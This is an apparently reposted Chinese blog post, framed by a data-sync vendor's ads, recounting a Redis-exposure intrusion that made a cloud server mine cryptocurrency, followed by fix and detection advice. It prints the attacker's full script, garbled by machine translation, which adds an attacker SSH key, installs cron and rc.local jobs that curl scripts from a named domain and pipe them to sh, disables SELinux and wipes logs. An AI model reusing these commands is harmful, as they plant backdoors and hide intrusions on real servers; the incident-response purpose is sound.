快速,持续,稳定,傻瓜式
支持Mysql,Sqlserver数据同步

记一次Redis数据库漏洞被入侵现象

在线QQ客服:1922638

专业的SQL Server、MySQL数据库同步软件

来自https://blog.csdn.net/qq_28516695/article/details/79441721

服务器状态:为便于研发,公司购买的云服务器上的Intranet服务器主要用于在开放服务器上使用Redis数据库服务,以方便相关R人员的使用。

现象:CPU几乎已满载(估计将用作烤鸡),并且SSH无法登录到服务器。

crontab-l查看计划的任务

挂断电话后,我登录了阿里云帐户,并查看了内存和CPU使用率。记忆没有传播。 CPU一直处于直线状态,始终为100%。后来,我查看了ps-aux以查看进程的CPU和内存使用情况,发现了以下内容:

第一条红线,cpu利用率达到98%,切换到该目录,发现有一个名为gpg-agent的可执行文件,我百度下面的东西,看来是用来加密进行远程登录的,但此过程中还有d个。我立即感到这可能是一种病毒,一直占用我的CPU。禁用它之后,CPU使用率开始线性下降,直到达到水平为止。

 

睡眠4

rm-rf/tmp/* 2 \ gt;/dev/null

rm-rf/var/tmp/* 2 \\ ugt26;/dev/null

睡觉1

cd/var/tmp || cd/tmp

睡觉1

[-d.ICE-unix/…] || mkdir-p.ICE-unix/…\ \ chmod-R 777.ICE-unix

睡觉1

cd.ICE-unix/…||退出100

睡觉1

找。-maxdepth 1-名称”.m *”-type f-mmin +66-删除

睡觉1

[-f.mash *] \ \退出0 ||触摸.mash $$

睡觉1

陷阱” rm-rf.mash *”退出

睡觉1

setenforce 0 2 /dev/null

睡觉1

回声SELINUX =禁用\\/etc/sysconfig/selinux 2 \\ u>/dev/null

睡觉1

crontab-r 2 \\ u>/dev/null

睡觉1

rm-rf/var/spool/cron 2 \ gt;/dev/null

睡觉1

crontab-l 2 \\>/dev/null

睡觉1

mkdir-p/var/spool/cron/crontabs 2 \ gt;/dev/null

mkdir-p/root/.ssh 2 \ gt;/dev/null

睡觉1

回声 “SSH-RSA AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0 + xigBIrdgo2p5nBtrpYZ2/GN3 + THY + PNUqx redisX” \ GT;/root/.ssh/authorized_keys

回声‘/30 * * * * curl-qs http://cdn.namunil.com/ash.php | sh’\ gt;/var/spool/cron/root

echo” /30 * * * * curl-qs http://cdn.namunil.com/ash.php | sh’\ gt;/var/spool/cron/crontabs/root

回声’curl-qs http://cdn.namunil.com/ash.php | sh’\ gt;/etc/rc.local

回声”退出0″ \ gt; \ gt;/etc/rc.local

grep-q 8.8.8.8/etc/resolv.conf ||回声”名称服务器8.8.8.8″ \ gt;/etc/resolv.conf

grep-q 5.206.225.60/etc/hosts ||回声” 5.206.225.60 static.cortins.tk” \ gt; \ gt;/etc/主机

睡觉1

猫lt;/etc/security/limits.conf

  •  

  •  

根硬nofile 25000

根软nofile 25000

EOF

回声0/var/spool/mail/root

回声0/var/log/wtmp

回声0/var/log/secure

回声0/root/.bash_history

睡觉1

curl-qs http://cdn.namunil.com/pgp.php | sh 2 \\ u>/dev/null

睡觉1

curl-qs http://cdn.namunil.com/ins.php | sh 2 \\ u>/dev/null

睡觉1

curl-qs http://cdn.namunil.com/bsh.php | bash 2 /dev/null

退出0

 

入侵原因:redis

早期redis在安装到软件源中后以root特权运行。 Redis提供了将数据转储到指定文件的功能。换句话说,您可以使用根权限将文件写入整个磁盘上的任何位置。文件的内容也是可控的。 ssh的authorized_keys并不严格要求数据格式。只要连续有一个公钥。这造成了漏洞。例如,使用redis将公共密钥写入root。将php webshell写入Web目录,依此类推。

有关特定漏洞的详细信息,您可以搜索redis write public key漏洞

新版本的redis将在安装过程中自动创建一个名为redis的用户。然后从此用户权限开始。

维修方法

1.升级到最新版本。

2.如果不是特别必要。 Redis的监视地址可以更改为127.0.0.1。

3.将访问密码添加到redis。但不要成为弱密码

受到感染后被检测到

1.检查crontab(/etc/crontab和/var/spool/cron/crontabs/中的文件)

2.检查异常过程。具体根据机器入侵的程度进行处理

3.检查/.ssh/authors_keys。如果发现连续书写。通常有一个过程监视或计划任务

4.检查/.profile和/.bashrc。看看是否有后门

其他方面

1.不要使用编译安装。软件源可以解决软件源。因为编译安装后,不会根据需求创建服务和低功耗帐户。等于root

相关推荐

 
QQ在线咨询
售前咨询热线
QQ1922638